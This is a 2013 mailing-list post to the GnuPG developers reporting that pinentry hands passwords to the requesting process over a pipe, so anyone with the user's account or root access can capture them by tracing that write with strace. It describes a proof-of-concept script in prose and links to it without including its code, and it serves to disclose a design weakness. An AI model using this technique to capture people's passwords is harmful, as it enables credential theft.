Pinentry makes it awfully easy to snoop all passwords entered by the user

[Niklas Schnelle]

Dear GnuPG Devs,

first I do understand this is not really a security vulnerability as it is
rooted in the very design of pinentry still it looks like a major problem
to me.

So as I understand it pinentry is used to request a password from the user
and it then sends that password to the requesting process via a pipe. The
problem here is that this
makes it a lot easier to snoop passwords than if gnupg read them in a more
direct way. To demonstrate this I've created a script [1] that waits for a
pinentry process to start and than uses strace to get a trace of the
syscall used to write the password to the pipe. This makes snooping on
users gpg passwords extremely easy. One simply runs the script and it
outputs the clear text passwords of all pinentry based password entries
plus some strace output I was too lazy to remove. Of course an attacker
needs access to the users account or root access but in many settings this
is quite easy to achieve (e.g. a trojan or an admin snooping on it's users).
Now if gnupg read the password itself it would at least be harder to grep
for it in it's trace and it might get even harder with more secure input
like what Wayland wants to provide in the future..
What do you girls/guys think?

Greetings Niklas Schnelle

[1] http://pastebin.com/79t1ATzx
-------------- next part --------------
An HTML attachment was scrubbed...
URL: </pipermail/attachments/20130828/8a51b923/attachment.html>